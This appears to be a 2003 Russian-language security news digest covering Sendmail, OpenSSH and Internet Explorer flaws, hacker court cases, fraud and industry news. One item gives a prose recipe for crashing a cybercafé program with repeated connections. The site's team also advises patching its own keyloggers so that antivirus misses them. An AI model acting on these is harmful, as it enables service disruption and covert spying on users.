Удаленное переполнение буфера обнаружено в почтовом сервере Sendmail. Локальный или удаленный атакующий может выполнить произвольный код на уязвимой системе. Переполнение буфера обнаружено в функции prescan() в parseaddr.c. В результате локальный или удаленный пользователь может перезаписать указатель стека и выполнить произвольный код на системе с привилегиями процесса sendmail. Способов устранения обнаруженной уязвимости не существует в настоящее время. В качестве временного решения предлагается подправить файл parseaddr.c в исходниках либо обновите программу до Sendmail 8.12.10, поскольку уязвимость обнаружена в версии до 8.12.9. Подробности - http://www.securitylab.ru/?ID=40306
17/09/2003 23:07 Хакеры не оставляют пользователей Windows в покое.
Во вторник специалисты компании iDefense, занимающейся вопросами компьютерной безопасности, обнаружили в Сети программу, распространяемую неизвестными злоумышленниками, при помощи которой возможно проникнуть в чужую систему. Вторжение происходит через бреши в некоторых версиях ОС Windows, обнаруженные на прошлой неделе корпорацией Microsoft. За сообщением о новых дырах немедленно последовало строгое предупреждение Департамента внутренней безопасности. Если пользователи не поставят очередную заплатку, создастся положение, поразительно напоминающее ситуацию, когда беспечность владельцев ПК позволила червю «Blaster» инфицировать сотни тысяч машин. В тексте, составленном Департаментом, говорится, что потенциальная атака может «оказать существенное влияние» на работу интернета. В связи с этим и домашним, и корпоративным пользователям Windows следует немедленно загрузить бесплатное обновление с сервера Microsoft. Представители iDefense, которые наткнулись на хакерскую заготовку на одном из китайских веб-сайтов, утверждают, что она уже была использована для взломов компьютеров с последующей установкой программ наблюдения. Специалисты полагают, что в течение нескольких дней — или даже часов — можно ожидать начала новой вирусной эпидемии. Корпорации Microsoft подтвердила, что в данный момент занимается изучением находки. Подробнее - http://www.webplanet.ru/news/security/2003/9/17/windows.html
17/09/2003 23:02 Адриана Ламо выпустили под залог.
«Добрый» хакер Адриан Ламо (Adrian Lamo), причастный к незаконным проникновениям в системы The New York Times, Yahoo! и других крупных компаний, неожиданно для всех признал обвинения против себя и сдался властям. Как сообщила представительница ФБР Карен Туми Эрнст (Karen Twomey Ernst), 22-летний хакер сам явился в федеральный суд, и им буквально пришлось арестовать его. Ламо обвиняетсят в умышленной модификации базы данных журнала Times, а также в нанесении ущерба изданию The New York Times на сумму свыше $25,000. В показаниях хакера сказано, что он добавил свое имя, номер мобильного телефона и адрес электронной почты в список сотрудников и административную базу данных Times, записав в графе «должность» — взлом компьютеров, национальная безопасность. Обвинители же добавляют, что помимо этого юный Ламо потратил более $300,000, пользуясь услугами электронного информационного сервиса LexisNexis (деньги он снимал, естественно, со счета Times). В частности, он искал в Сети упоминания о себе и своих «подвигах». Правда, в суде Ламо провел недолго — заплатив $250 000 залога, несчастные (или счастливые) родители забрали сына домой, пообещав уже в четверг явиться с ним в нью-йоркский офис ФБР. Хакер подтвердил причастность к взломам за последние несколько лет компьютеров таких корпораций, как Worldcom и Excite@Home. Он также признался в подмене текста по крайней мере одной новости на сайте Yahoo! в сентябре 2001 года. Источник - http://www.webplanet.ru
17/09/2003 23:00 Sun Microsystems представляет альтернативу Microsoft Windows.
Компания Sun Microsystems намерена представить во вторник операционную систему под кодовым названием Mad Hatter, сообщает Associated Press. По словам руководства Sun, новый продукт, разработан на базе системы Linux и должен составить достойную конкуренцию многим компонентам Microsoft Windows. В Sun считают, что разработка сумеет заменить интернет-броузер, рабочую оболочку и такие приложения Windows, как Microsoft Office. Стоимость Mad Hatter составит около 50 долларов. "Мы говорим о существенных сбережениях - более 75 процентов суммы, необходимой для обновления продукции Microsoft", - прокомментировал выход новой продукции вице-президент Sun Ларри Сингер. Как одно из ключевых преимуществ системы Sun перед Microsoft Windows, Сингер отметил отсутствие угроз вирусных эпидемий для пользователей нового продукта. Подробности - http://www.msnbc.com/news/967209.asp?0cv=CB10
17/09/2003 22:59 В разделе заметок новая статья: Кейлоггер? Это просто!
В этой статье рассматриваются некоторые функции Win32 API, приемы и методы программирования под Windows достаточные для написания простого клавиатурного шпиона. Статья написана опираясь на материалы и вопросы форума uinc.ru по этой теме. Ознакомиться: http://www.uinc.ru/articles/zametki/001.shtml
17/09/2003 14:48 Трояны в наших программах
На днях нам пришло письмо от какого-то умника, который сообщает, что на наши программы (Keyboard Grabber (KBG) и UINC KeyLogger) ругается антивирус. Хотелось бы прояснить ситуацию... Во-первых, политика антивирусных компаний такова - если троян или кейлоггер в бесплатной версии не показывает никаких предупреждений, значит это вредоносная программа и ее необходимо занести в антивирусную базу. Это как раз и есть причина, почему два наших кейлоггера определяются антивирусами. Во-вторых, если вам необходим кейлоггер, который не будет определяться антивирусами, то вы можете либо пропатчить наши кейлоггеры, либо найти другой, который еще не попал в базу, либо купить shareware разработку. Источник - команда uinc.
16/09/2003 18:28 Патч для латания уязвимости в OpenSSH.
На сайте FreeBSD.org выложен патч, латающий уязвимость, о которой мы сообщали в предыдущей новости. сам патч правит исходник файла /src/crypto/openssh/buffer.c. Кроме того, на сайте OPenSSH.org сообщается о выходе сегодня OpenSSH 3.7. Патч - http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/buffer.c.diff?r1=1.1.1.6&r2=1.1.1.7&f=h
16/09/2003 17:24 Клонирование сетевого стека на FreeBSD.
Как сообщается на linux.org.ru, Marko Zec представил патч для клонирование/виртуализации сетевого стека для ядра FreeBSD. Теперь можно иметь несколько независимых сетевых стеков, работающих в контексте одного ядра. В первую очередь, это будет использоваться для создание полностью изолированного и контролируемого pseudo virtual machine environments. Подробнее - http://www.freebsdforums.org/forums/showthread.php?threadid=14126
16/09/2003 16:41 Удалённая уязвимость в OpenSSH - реальность или вымысел?
Сразу из нескольких источников стало известно о наличии, как минимум, одной уязвимости в дефолтовой инсталляции openssh. По слухам, существует рабочий эксплоит, который позволяет удаленному атакующему получить root привилегии на FreeBSD, RedHat, Gentoo, и Debian системах, использующих последнюю версию OpenSSH. Известно несколько случаев успешной компрометации OpenSSH системы по неизвестным причинам. Команда OpenSSH пока никак не комментирует распространяющиеся слухи. Пока ситуация не прояснится, рекомендуется закрыть доступ к OpenSSH серверам из недоверенных источников или использовать альтернативное программное обеспечение. (например lsh ). Ниже опубликованы несколько писем из Full-Disclosure, в которых обсуждается эта проблема. Подробности и эксплоит - http://www.securitylab.ru/?ID=40256
16/09/2003 16:23 У Microsoft отнимают Internet Explorer и 500 миллионов долларов.
Создатели программного обеспечения для работы в Интернете с нетерпением ожидают радикальных изменений в программе Internet Explorer, которые корпорации Microsoft будет вынуждена внести после решения чикагского окружного суда. Как сообщается на сайте BBC News, суд счел, что Microsoft использовала часть технологий, запатентованных ранее малоизвестной компанией Eolas. Суд не принял во внимание заявление Microsoft о том, что патент конкурирующей компании недействителен, так как указанные технологии использовались в более ранних версиях Internet Explorer, и постановил удовлетворить требование Eolas о выплате компенсации в размере 521 миллиона долларов. Представители Microsoft намерены апеллировать в суд более высокой инстанции. "Мы верим, что собранные нами доказательства подтвердят тот факт, что никакого пересечения патентов не существует", - говорится в официальном заявлении корпорации. Однако консорциум World Wide Web, ответственный за установление стандартов Интернета, в свою очередь, выступил с предупреждением о том, что Microsoft "придется в ближайшее время внести изменения в программы в соответствии с решением суда" Подробности - http://news.bbc.co.uk/2/hi/technology/3109180.stm
16/09/2003 15:54 Microsoft обновила прошивку Xbox, чтобы пресечь установку на приставку ОС Linux.
Компания Microsoft разработала метод борьбы с энтузиастами, устанавливающими на свои приставки операционную систему Linux. Напомним, что это оказалось возможным даже без применения мод-чипов благодаря наличию ошибок во встроенной в Xbox программе Dashboard. Чтобы бороться с этим, в Microsoft решили использовать онлайновую игровую службу Xbox Live для обновления Dashboard до новой версии, не позволяющей установить на приставку Linux. Обновление осуществляется без предварительного уведомления, что разозлило энтузиастов-линуксоидов. Тем не менее. винить в чем-то Microsoft нельзя, так как по замечанию издания The Inquirer, на упаковках всех игр с поддержкой Xbox Live имеется предупреждение о том, что Microsoft сохраняет за собой право без предупреждения обновлять ПО приставки. Источник - http://www.compulenta.ru
16/09/2003 15:12 Бета-тестирование сервис-пака для Windows Server 2003.
Компания Microsoft начала бета-тестирование первого пакета обновлений для операционной системы Windows Server 2003, выпущенной на рынок весной нынешнего года. Окончательная версия сервис-пака должна выйти в начале 2004 года. Список версий сервис-пака опубликован на сайте Bink.nu. В списке фигурируют сервис-паки для 32- и 64-разрядных версий Windows Server 2003 Standard, Enterprise и Datacenter. Кроме того, в списке присутствуют тестовые версии ОС Windows XP 64-Bit Edition Version 2003 в вариантах для систем на процессорах Intel Itanium и процессорах с расширенным набором 64-разрядных команд, под которыми, очевидно, понимаются чипы AMD Opteron и Athlon 64. Подробности - http://winxp.bink.nu/BinkPortal/DesktopModules/ArticleDetail.aspx?ArticleID=90
16/09/2003 14:49 Panda PerimeterScan ISA Server Edition.
Компания Panda Software сообщает о выходе нового мощного решения, предназначенного для защиты компьютеров от вредоносных кодов, которое интегрируется с Microsoft Internet Security and Acceleration (ISA) Server 2000 - Panda PerimeterScan ISA Server Edition. Panda PerimeterScan ISA Server Edition проверяет и обезвреживает входящие и исходящие файлы по протоколам Web (HTTP) и электронной почты (SMTP). Установленное как веб фильтр и фильтр приложений, антивирусное решение компании Panda Software интегрируется с компонентами ISA Server: сервисами Web Proxy и Firewall. Кроме того, Panda PerimeterScan ISA Server Edition включает в себя новый модуль фильтрации содержимого, позволяющий активно блокировать проникновение новых вирусов и облегчающий политику недопущения нежелательных материалов, а также материалов, не имеющих отношения к работе организации. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=189
16/09/2003 14:06 Новая версия John the Ripper.
Как сообщает dl на www.bugtraq.ru, На Openwall Project анонсирована новая development-версия одной из самых известных программ, используемых для подбора паролей - John the Ripper. Отмечается значительно возросшая скорость по сравнению со стабильной версией 1.6, датируемой 98-м годом. Предыдущее существенное обновление произошло в декабре 2002 года (добавилась поддержка OpenVMS). Данная версия не является окончательным релизом, не включает в себя charset-файлы (их достаточно взять из стабильной 1.6) и доступна только в исходных текстах. Источник - http://www.openwall.com/john/
16/09/2003 13:48 Баллмер: уничтожить вирусы в зародыше!
В понедельник генеральный директор Microsoft Стив Баллмер предупредил, что выявленные недавно уязвимости представляют собой «новую и растущую угрозу инновациям», и заявил, что его компания находится под огнем со стороны «воров, аферистов, террористов и хакеров». В ответ софтверный гигант планирует разработать новые средства борьбы с такими угрозами и положить конец этим проискам, прежде чем они наведут хаос, подобный тому, какой недавно вызвали такие вирусы, как MSBlast. «Важнейшая область, на которой мы сосредоточились, — технология защиты, — сказал Баллмер, выступая в Churchill Club перед бизнесменами Кремниевой долины. — Нам известно, что плохие парни продолжают писать вирусы. Задача в том, чтобы помешать им, прежде чем они проберутся в наши ПК». Традиционно подобная технология была прерогативой антивирусных компаний, но Баллмер подчеркнул, что он хочет теснее сотрудничать с такими фирмами, как Symantec и Network Associates. «Это общая проблема отрасли, которую должна решать не только Microsoft», — сказал он, отметив, что угрозе подвергаются как операционная система, так и сетевые инфраструктуры, включая маршрутизаторы, базы данных и каналы интернет-сервис-провайдеров. В июне Microsoft приобрела румынского производителя антивирусного ПО GeCad Software. Баллмер заявил, что он понимает: заказчики ждут от компании большего. «Многие наши заказчики страдают от этого, — сказал он. — Мы должны поднять планку качества продуктов в области безопасности». В частности, Microsoft нужно усовершенствовать метод распространения поправок к программному обеспечению и управления ими. Кроме того, производитель ПО ищет способы привлечь другие компании к тому, что он называет «постпроцессингом» своего кода — то есть к анализу существующих программ на наличие уязвимостей и использованию новейших вирусов для проверки, не указывают ли они на другие пробелы в защите. «Работы впереди еще много», — сказал Баллмер. Подробности - http://zdnet.com.com/2100-1105_2-5076903.html
15/09/2003 19:37 Уязвимость в IE (очередная).
Уязвимость обнаружена в Microsoft Internet Explorer (IE). Удаленный пользователь может загрузить и выполнить произвольный код на целевой системе пользователя. Удаленный пользователь может эксплуатировать недостаток в media sidebar, чтобы заставить IE загрузить файл ресурсов в "My Computer" зоне и выполнить произвольный код. Подробнее - http://www.securitylab.ru/?ID=40246
15/09/2003 16:32 Мобильное мошенничество в Москве.
10 сентября в газете "Известия" был опубликован материал, посвященный новому виду мошенничества, придуманный и реализованный заключенными подмосковной колонии общего режима. Жертвами мошенников, по данным "Известий" стали тысячи абонентов, лишившиеся сумм от 10 до 100 и больше долларов. Схема обмана владельцев "мобильников" довольно проста, но требует хорошего знания психологии. Жертве звонил мошенник, представлялся родственником, другом или сослуживцем и сообщал, что попал в аварию (сбил человека, задержан милицией и тому подобное). Различия в звучании голоса объяснялись травмой, стрессовым состоянием или плохой связью. Звонок с чужого мобильника также объяснялся чрезвычайными обстоятельствами. Далее следовала просьба купить карточку экспресс-оплаты номиналом от 10 до 100 долларов и продиктовать код карты по телефону. Деньги надо было положить на счет владельцу "чужого" телефона, с которого велся разговор. "Мошенники демонстрировали хорошие знания психологии. Они делали все, чтобы не дать "клиенту" выйти из стрессовой ситуации, понимая, что способность здраво мыслить в состоянии шока притупляется", - сообщается в материале "Известий". Директор по безопасности ОАО "Вымпелком" (торговая марка "Би Лайн") сообщил, что люди довольно легко попадались на уловки мошенников. Жертвами мобильных лохотронщиков оказались даже сами сотрудники сотовых компаний и работники правоохранительных органов. Подробности - http://finiz.ru/cfin/tmpl-art/id_art-635766
15/09/2003 15:27 Zlogin - новая система защиты информации от SecurIT.
Как сообщает www.cnews.ru, компания SecurIT объявила о выпуске Zlogin – системы двухфакторной аутентификации пользователей с использованием электронных ключей. Система избавляет пользователей от необходимости запоминать пароли, синхронизировать их и периодически менять, а также снижает нагрузку на ИТ-департамент, связанную с забываниями паролей. Администрирование системы осуществляется централизованно, через службу каталогов. Кроме этого, Zlogin повышает безопасность сетевых ресурсов, за счет автоматической генерации «сильных» паролей и их смену с заданной периодичностью без участия пользователя. Система Zlogin хранит учетные записи для входа в сеть в защищенной памяти электронных ключей или смарт-карт и обеспечивает аутентификацию пользователей в следующих системах: * Windows 2000/2003 Active Directory * Домен Windows NT 4.0 * Novell NetWare NDS / eDirectory * SAMBA (сервер Linux) * Локальные рабочие станции Windows NT 4.0/2000/XP Система Zlogin ориентирована на предприятия с гетерогенной структурой сети, когда в процессе работы пользователям требуется одновременное подключение к ресурсам, расположенным на серверах разных платформ, например, под управлением Windows и Novell NetWare. Подробнее - http://www.securit.ru/
15/09/2003 13:23 Традиционный еженедельный отчёт о вирусах Panda Software.
Как и положено, Panda Software выпустила очередной еженедельный отчёт о вирусах прошедшей недели. Наиболее интересными червями прошлой недели следует признать: Mimail.B, Gaobot.L, версии 'A' и 'B' червя Neroma, Gelcan.A и Vote.K. Также заслуживает внимания компьютерная мистификация Evocash. Более подробное описание - http://www.viruslab.ru/press/index.php?go=show&num=188
15/09/2003 15:21 Защиту CD от копирования подняли на новый уровень.
Компания BMG Music впервые в Соединенных Штатах выпустит музыкальный CD с защитой от копирования — этот шаг открывает новый этап технологического экспериментирования фирм звукозаписи. В новый альбом сольного исполнителя Энтони Хэмилтона отделение BMG фирмы Arista Records включит «средства управления копированием» компании SunnComm Technologies. Arista уже выпускала промоушн-копии различных CD с защитой от копирования, но данный выпуск — первая серьезная проверка реакции потребителей на новое поколение антипиратских средств. «BMG ставит на первое место удобство для потребителей, — говорит директор компании по стратегии Томас Гессе. — Благодаря усовершенствованиям в... технологии появилась возможность предложить потребителям тот уровень гибкости, к которому они привыкли, но при этом обеспечить лучшую защиту прав исполнителей». Поток аналогичных выпусков вряд ли хлынет незамедлительно, но действия BMG открывают новую главу в истории заигрывания американских фирм звукозаписи с технологией защищенных от копирования CD. Большинство крупных фирм говорили о своей глубокой заинтересованности в технологиях таких компаний, как SunnComm и Macrovision, но опасались проблем совместимости с разными типами компьютеров и устройств потребительской электроники, а также оттока покупателей. Между тем Macrovision утверждает, что во все мире – особенно в Европе и Японии — выпущено свыше 150 млн дисков с технологией защиты от копирования. Источник - http://www.zdnet.ru
14/09/2003 16:03 FAQ по уязвимостям в DCOM/RPC
На сайте www.securitylab.ru опубликован довольно любопытный и, думается, полезный для многих FAQ по недавно обнаруженной уязвимости в службе DCOM/RPC в семействе ОС Windows. Вкратце описаны способы устранения уязвимостей в RPC DCOM и возможные проблемы, которые могут возникнуть при этом. Даны рекомендации по каждой версии ОС. Подробности - http://www.securitylab.ru/?ID=40208
14/09/2003 15:56 Резкий рост Internet-атак в Азии.
Сингапурская фирма e-Cop.net сообщает о том, что в августе по сравнению с июлем количество инцидентов безопасности Internet в странах Азии выросло почти в полтора раза. Ситуацию иллюстрирует разработанный в компании индекс e- Security, отражающий количество вирусов, "червей", уязвимостей и атак. В августе индекс достиг значения 1242, что на 534 выше, чем в июле, и является самой высокой отметкой за последние два года. Наиболее частым видом инцидентов были попытки зондирования службы Internet Control Message Protocol на предмет уязвимости (31%). Частыми были также попытки взлома Web-служб и сканирование порта TCP 135. На долю "червя" Slammer пришлось лишь 4% инцидентов. Чаще всего атаки осуществлялись из США (32% случаев); на втором месте - Корея (22%), на третьем - Малайзия и Индия (по 10%). Источник - http://www.osp.ru
14/09/2003 15:42 Cтатья "Защищаем TCP/IP стек от SYN DoS атак".
На сайте www.opennet.ru выложена ссылка на статью "Защищаем TCP/IP стек от SYN DoS атак", которая появилась на сайте securityfocus.com под оригинальным названием "Hardening the TCP/IP stack to SYN attacks", автор - поляк Mariusz Burdach. В статье рассказано как определить, что ваша система подверглась SYN атаке. Даны практические рекомендации по защите от данного вида атак в Linux, Windows 2000, Sun Solaris и HP-UX. Как нам кажется, статья может представлять интерес для администраторов перечисленных ОС, а также специалистов по сетевой безопасности. Статья - http://www.securityfocus.com/infocus/1729
14/09/2003 11:39 Gartner подтвердила выводы Microsoft о преимуществах Windows перед Linux.
Аналитическая фирма утверждает, что пользователи только старых версий настольных операционных систем Microsoft могут получить какое-либо преимущество от перехода на Linux. В опубликованном аналитической фирмой отчете говорится, что на долю операционной системы и ПК приходится меньше трети общей стоимости владения и что возможность перехода можно рассматривать лишь в немногих ситуациях. Майкл Силвер, вице-президент и директор по исследованиям Gartner, подчеркивает, что необходимо учитывать другие расходы, такие как оплата труда специалистов, обучение и внешние услуги. По его словам, организации должны сравнивать расходы и экономию от перехода на Linux с расходами и экономией от апгрейда на новую версию Windows, так как общая стоимость владения зависит от внедряемой версии Windows. «Предприятия, работающие с Windows 95, должны получить больше преимуществ от перехода на Linux, чем предприятия, использующие Windows 2000 или Windows XP. В Windows 2000 и Windows XP входит более современная технология, чем в Windows 95, и в целом они стабильнее и требуют меньше расходов», — пишет Силвер. Более подробно - http://zdnet.com.com/2100-1104_2-5074555.html
14/09/2003 11:21 Поддержка BSD/OS закончится 31 декабря 2004 г..
Как сообщает linux.org.ru, в списке рассылки bsdi-users mailing list объявлено, что поддержка BSD/OS закончится 31 декабря 2004 г. BSD/OS - промышленный BSD Unix, выпускаемый фирмой Wind River. В связи с тяжелым экономическим положением в последние несколько лет, фирма объявляет о сворачивании всех своих разработок, основанных на BSD/OS. Подробности - http://www.bsdnewsletter.com/2003/09/News105.html
14/09/2003 10:03 Удаленный DOS в "Компьютерный зал 1.70".
Как сообщил посетитель нашего форума с ником Diman, им обнаружена уязвимость в двольно популярной программе для обеспечения работы компьютерных залов (Интернет - кафе) "Компьютерный зал 1.70". Как следует из описания, "Программа предназначена для автоматизации работы компьютерных клубов. Внимательно следит за работой администраторов, ведет подробные отчеты". Автор программы - Щербатюк Руслан Андреевич из Одессы (http://ruslan.odessa.ua/about-compzal.php). Автором (уязвимости) было замечено, что при создании около 90 соединений на порт серверной части "Компьютерно зала" (по умолчанию - 850/TCP) и при посылке на кждое из установленных соединений 100 символов "А" возникает типичная ситуация DoS, визуально выражаемая в "красном кресте", а функционально - в отказе функционирования программы. Как было указано выше, тестирование производилось на версии 1.70 в ОС: Win98SE Rus, Win2K Server Rus. Хотелось бы, правда, заметить, что в результате поиска в Инете была обнаружена версия 2.05v, которая и является на данный момент крайней версией программы. Источник - http://www.uinc.ru/forum/messages/207.html
13/09/2003 15:11 Радиосети большинства учреждений имеют неэффективную защиту.
Обеспечение должного уровня информационной безопасности - главная задача практически любой современной организации. До тех пор, пока проблема безопасности не решена, невозможна долгосрочная устойчивая работа. Ключевые данные могут быть внезапно уничтожены или злонамеренно модифицированы; они могут попасть в руки тех, кто не должен знакомиться с их содержанием. Техническими специалистами CCRC были проведены исследования на предмет безопасности предприятий, использующих в качестве приёма-передачи данных беспроводные технологии (Радиосети) на участке КЛИЕНТ-ПРОВАЙДЕР. Результаты оказались неутешительными, т.к. в 72% доступ во внутреннюю сеть предприятия были незащищены от внешнего вторжения, 23% имели малоэффективную защиту, неспособную в полной мере обеспечить конфиденциальность информации, и лишь 5% имели защиту, соответствующую современным нормам безопасности. Необходимо отметить, что такой тип вторжения возможен посредством использования мобильного компьютера (ноутбука), соответствующего ПО и специальной антенны, предназначенной для работы в соответствующих частотах радиосети (кстати, такую антенну можно изготовить самостоятельно, взяв схему и расчёты с соответствующих ресурсов Интернета), сидя, к примеру, в машине на стоянке для автотранспорта перед тем, или иным зданием. Источник - http://www.crime-research.org
13/09/2003 14:04 Большой Брат на страже вашего имущества.
Изобретение, получившее название Большой Брат и позволяющее отследить местоположение человека при помощи его мобильного телефона, возможно, скоро будут монтировать и в различные предметы бытовой аппаратуры. Таким образом, от всевидящего ока полиции не скроется ни одна кража. Телевизоры, DVD-плееры и компьютеры можно оснастить микрочипами, определяющими местоположение техники и автоматически информирующими полицию всякий раз, когда дислокация дорогостоящего предмета обихода будет неожиданно меняться. Именно к этому сводится утверждение профессора Найджела Линга (Nigel Linge) из британского Центра сетевых и телекоммуникационных разработок. «Мы еще не доказали на практике, что наше изобретение на такое способно, однако сами в этом ни сколько не сомневаемся», — заявил профессор репортерам Reuters в среду. Линг также сообщил, что пилотный проект по тестированию разработки, в основу которой положен радиопередатчик, совмещенный с мобильными технологиями, идет под наблюдением полиции на севере Англии, в Манчестере, уже шесть месяцев. Чудо техники способно определять местоположение пропажи с точностью до метра, добавил он. Источник - http://www.webplanet.ru
13/09/2003 13:32 Linux является самой атакуемой операционной системой.
Британская компания mi2g, специализирующаяся на проблемах компьютерной безопасности, опубликовала статистику хакерских атак на серверы в течение августа. В исследовании учитывались только успешные атаки, о проведении которых имеются достоверные данные. Как оказалось, самой атакуемой системой является Linux - под ее управлением работали 67% успешно атакованных в августе серверов. В абсолютном выражении число пораженных хакерами серверов под Linux составило 12892. Что касается Windows, то эта система занимает почетное второе место в рейтинге успешных атак. В августе хакеры успешно поразили 4526 серверов под Windows, что составляет 23,2% от общего числа успешных хакерских атак. Интересно, что системы семейства BSD оказались более устойчивы к атакам - за август хакеры поразили только 360 таких компьютеров, что составляет 2% от общего числа успешных атак. Интересно, что среди успешных атак на компьютеры правительственных организаций доля Windows заметно выше, чем Linux. Среди успешных атак 51,4% были осуществлены на серверы с Windows и всего 14,3% - на компьютеры с Linux. Это, впрочем, может быть связано с относительно небольшой долей Linux в правительственном секторе. В целом же Linux остается самой атакуемой системой, и ее доля постоянно растет. В среднем за последний год 51% всех успешных хакерских атак были проведены на серверы под управлением Linux. Источник - http://www.compulenta.ru
13/09/2003 13:17 Окончательную версию Office 2003 утащили пираты.
Сайт ExtremeXP сообщает о появлении в интернете окончательного варианта офисного пакета Microsoft Office 2003, который пока не выпущен официально. Сотрудникам сайта удалось раздобыть Office 2003 через специализированные чаты IRC. Утекший вариант Office 2003 состоит из пяти компакт-дисков. На первом находится пакет Office 2003 Professional, включающий в себя Access, Excel, Infopath, Outlook, Powerpoint, Publisher и Word. На других четырех дисках находятся пакеты Frontpage, Visio, Project и OneNote. Изменений, по сравнению с последней бета-версией, в окончательном варианте Office 2003 немного. В основном, они касаются исправления ошибок и косметических улучшений в интерфейсе. Обращает на себя внимание панель Office Online, встроенная в основные окна офисных программ. Подробнее - http://www.extremexp.net/board/index.php?showtopic=42
13/09/2003 12:12 Суд требует от Microsoft найти стертые электронные письма.
Судья Фредерик Мотц, рассматривающий сразу несколько дел против корпорации Microsoft, предписал софтверному гиганту восстановить, по возможности, утраченную электронную переписку, связанную с иском компании Burst.com. Эта компания обвиняет Microsoft в незаконном использовании запатентованных технологий в области потоковых видеотрансляций. По заявлениям Burst.com, Microsoft долго вела с ней переговоры о лицензировании технологий, но затем прервала их и без спроса встроила в Windows Media принадлежащие Burst.com технологии. В качестве доказательства этого, по мнению Burst.com, могут использоваться электронные письма, о существовании которых знают в Burst. Однако в Microsoft не представили эти письма в суде, так как они были удалены. Источник - http://www.compulenta.ru
13/09/2003 11:56 Windows Server 2003 страдает от несовместимости.
Предприятия, использующие Windows NT и планирующие апгрейд на Server 2003, столкнутся с препятствием в форме SQL Server 7. Пользователи Windows NT Server 4.0 мечтают о переходе на Windows Server 2003, но, как признали сами руководители Microsoft, главное препятствие на пути к этому кроется в самой компании. «Одна из основных проблем, с которыми сталкиваются австралийские заказчики NT, заключается в том, что SQL Server 7 не работает на Server 2003», — сказал менеджер по маркетингу Windows-серверов Microsoft Australia Майкл Леворти. Корпоративной СУБД Microsoft SQL Server 7 уже четыре года. Следующая версия с кодовым названием Yukon находится в стадии разработки. Microsoft будет поддерживать NT до конца 2004 года, хотя поддержка NT 4.0 Workstation по телефону прекратилась в июне. По словам Леворти, заказчики жалуются на то, что им приходится тратить слишком много времени на обслуживание своих NT-систем. «Заказчикам NT приходится решать вопросы защиты, администрирования и поддержки собственных пользователей», — сказал он в интервью ZDNet Australia. ИТ-бюджеты всегда будут проблемой ИТ-менеджеров, обосновывающих приобретение новых технологий. «Наш бюджет не резиновый. Как же мы можем внедрить Windows 2003 и сразу же возвратить инвестиции?» — вот обычный вопрос, который Леворти слышит от заказчиков NT. Другая часть пользователей не может осуществить апгрейд из-за проблем совместимости приложений. Microsoft признает, что при портировании корпоративных приложений, работавших на NT, могут возникать проблемы. «Мы стремимся помочь таким заказчикам, и я сам работал с группой избранных партнеров над решением всех этих проблем», — сказал Леворти. Подробности - http://www.zdnet.ru/?ID=306434
13/09/2003 10:51 Президент Symantec захотел лишить пользователей информации о новых изъянах в программном обеспечении.
Распространение в интернете информации и программного обеспечения, которое могут использовать в преступных целях хакеры и вирусописатели, должно стать уголовно наказуемым преступлением. Такое предложение выдвинул Джон Шварц - президент компании Symantec, занимающейся разработкой антивирусного программного обеспечения, сообщает сайт Wired News. По словам Шварца, создатели вредоносных программ очень часто используют сведения и приложения, полученные на многочисленных специализированных веб-сайтах. Объявив размещение такого рода материалов вне закона, можно будет существенно уменьшить число вирусных инцидентов и хакерских атак, убежден глава Symantec. При этом он не уточнил, каким образом следственным органам следует делать различия между незаконной информацией и сведениями, необходимыми для обеспечения электронной безопасности. Шварц также не пояснил, может ли принятие инициируемого им закона трактоваться как попытка ограничить свободу слова. Информация, размещенная на Wired News, породила масштабную дискуссию в кругах, связанных с обеспечением компьютерной безопасности, отмечает сайт газеты The Sydney Morning Herald. Оппоненты Шварца, в первую очередь, обратили внимание на информационный сайт Security Focus, приобретенный Symantec в июле прошлого года за 75 миллионов долларов. Члены специального сообщества сайта, Bugtrack, информируют пользователей об изъянах в программном обеспечении. "Как мы все знаем, когда дело доходит до обсуждения брешей, очень трудно отделить аспекты, используемые в целях безопасности, от аспектов, используемых хакерами. Если компания Symantec ратует за принятие такого закона, готова ли она направлять в тюрьму участников Bugtrack?", - спросил один из авторов статей сообщества. Подробнее - http://www.wired.com/news/infostructure/0,1377,60391,00.html
12/09/2003 15:10 Власти США пугают пользователей вирусом, эксплуатирующим новые бреши Windows.
В ближайшее время в интернете может распространиться вирус, эксплуатирующий новую брешь в операционных системах компании Microsoft. C таким заявлением выступили представители отделения Министерства внутренней безопасности США (Department of Homeland Security), занимающегося преступлениями в сфере компьютерной безопасности. В четверг вечером американское ведомство распространило предупреждение о "возможности нового значительного удара по интернету", который может стать результатом обнаружения бреши в системах Windows NT 4.0, Windows 2000, Windows XP и Windows Server 2003, сообщает Agence France-Presse. Источник - http://www.viruslist.ru
12/09/2003 13:38 Эксперт насчитал 30 брешей в Internet Explorer.
Новость в дополнение вчерашней. Несмотря на работу по модернизации программного обеспечения, регулярно проводимую специалистами Microsoft, в одном из самых известных приложений этой компании - Internet Explorer - по-прежнему существует около 30 брешей. С таким заявлением выступил старший исследователь компании PivX Solutuions в области компьютерной безопасности Тор Лархолм, сообщает сайт австралийской газеты The Sydney Morning Herald. По словам Лархолма, только 11 сентября в создаваемый им список изъянов Internet Explorer он добавил семь новых пунктов, сведения о которых предоставил китайский специалист Лю Ди Ю. "Один из вновь обнаруженных изъянов использует новое направление атаки, с которым мы сталкивались недавно. Если говорить более конкретно, речь идет об искажении запроса пользователя. Этот недостаток позволяет переориентировать клик мыши, например, на кнопку "ОК" в диалоговом окне запроса о подтверждении безопасности соединения. Это может произойти в тот момент, когда пользователь перетаскивает на экране окно браузера", - отметил Лархолм. Эксперт убежден, что изъяны подобного рода могут поставить вопрос о необходимости лишения Internet Explorer некоторых ключевых функций ради повышения степени безопасности. В настоящее время возможность перемещать окно браузера в большей степени оказывает вред, нежели пользу безопасной работе пользователя. Остальные шесть брешей связаны с ошибками в скриптах и позволяют злоумышленникам похищать важные данные с произвольных сайтов, например почтовых веб-служб. Воспользовавшись подобными изъянами в комплексе с любым из известных методов загрузки файлов из локальных сетей, преступники могут получить доступ к локальным файлам и выполнять любые команды на нужных им компьютерах. Лю Ди Ю публиковал сведения о подобных изъянах и раньше. К многим из них Microsoft уже выпустила заплатки. "Как мне известно, оставшиеся уязвимости внимательно изучаются специалистами компании, и я уверен, что в ближайшее время они будут ликвидированы", - рассказал Лархолм. Информация взята с viruslist.com. Подробности - http://www.smh.com.au/articles/2003/09/11/1063249516080.html
12/09/2003 13:29 Cтатья "Безопасность систем с открытым кодом".
